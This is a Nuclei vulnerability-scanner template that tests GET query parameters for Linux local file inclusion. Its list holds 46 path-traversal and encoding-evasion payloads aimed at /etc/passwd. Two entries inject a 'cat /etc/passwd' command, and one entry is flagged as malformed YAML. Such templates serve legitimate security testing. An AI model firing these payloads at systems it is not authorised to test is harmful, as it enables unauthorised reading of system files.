nuclei-templates/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml


# DAST template: fuzzes GET query parameters with Linux path-traversal
# strings and reports a response whose body contains the root entry of
# /etc/passwd. Detection only; no file is written or executed on the target.
id: linux-lfi-fuzz

info:
  name: Local File Inclusion - Linux
  author: DhiyaneshDK
  severity: high
  reference:
    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/directory_traversal.txt
    - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
  metadata:
    # One request per payload: 46 entries in nix_fuzz below.
    max-request: 46
  tags: lfi,dast,linux

http:
  # Only GET requests are fuzzed; requests with other methods are skipped.
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      # Traversal variants covering plain, URL-encoded, double-encoded,
      # overlong-UTF-8, backslash and null-byte (%00) suffix forms.
      # Single-quoted scalars keep backslashes literal.
      nix_fuzz:
        - '/etc/passwd'
        - '../../etc/passwd'
        - '../../../etc/passwd'
        - '/../../../../etc/passwd'
        - '../../../../../../../../../etc/passwd'
        - '../../../../../../../../etc/passwd'
        - '../../../../../../../etc/passwd'
        - '../../../../../../etc/passwd'
        - '../../../../../etc/passwd'
        - '../../../../etc/passwd'
        - '../../../etc/passwd'
        - '../../../etc/passwd%00'
        - '../../../../../../../../../../../../etc/passwd%00'
        - '../../../../../../../../../../../../etc/passwd'
        - '/../../../../../../../../../../etc/passwd^^'
        - '/../../../../../../../../../../etc/passwd'
        - '/./././././././././././etc/passwd'
        - '\..\..\..\..\..\..\..\..\..\..\etc\passwd'
        - '..\..\..\..\..\..\..\..\..\..\etc\passwd'
        - '/..\../..\../..\../..\../..\../..\../etc/passwd'
        - '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd'
        - '\..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
        - '..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
        - '%252e%252e%252fetc%252fpasswd'
        - '%252e%252e%252fetc%252fpasswd%00'
        - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
        - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00'
        - '....//....//etc/passwd'
        - '..///////..////..//////etc/passwd'
        - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd'
        - '%0a/bin/cat%20/etc/passwd'
        - '%00/etc/passwd%00'
        - '%00../../../../../../etc/passwd'
        - '/../../../../../../../../../../../etc/passwd%00.jpg'
        - '/../../../../../../../../../../../etc/passwd%00.html'
        - '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd'
        - '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
        # NOTE(review): as written, the single-quoted scalar below closes at the
        # third quote and the rest of the line is not valid YAML (a literal '
        # inside single quotes must be written ''). Verify the quoting against
        # the upstream file before relying on this entry.
        - '\\'/bin/cat%20/etc/passwd\\''
        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'

    fuzzing:
      - part: query
        type: replace # replaces existing parameter value with fuzz payload
        # Every query parameter in the URL is rewritten in the same request,
        # so a match does not by itself identify which parameter is affected;
        # confirm the parameter manually before filing a finding.
        mode: multiple # replaces all parameters value with fuzz payload
        fuzz:
          - '{{nix_fuzz}}'

    # Stop after the first matching payload to avoid a flood of duplicate
    # results for one endpoint.
    stop-at-first-match: true
    matchers:
      # Matches the uid 0 / gid 0 line of a typical /etc/passwd
      # (e.g. "root:x:0:0:") echoed in the response body.
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'
# NOTE(review): the digest below appears to be the template signature; any change
# to the template body above presumably requires re-signing for it to verify.
# digest: 4a0a0047304502206c53383c7a148e9311173ee5bb2bf1177386db240eff9b2f6d8256e88cbf5f1a022100ddb39020f7957af58c62c6ec59c7094277c8193e4ab089cd4cce994da4d140d8:922c64590222798bb761d5b6d8e72950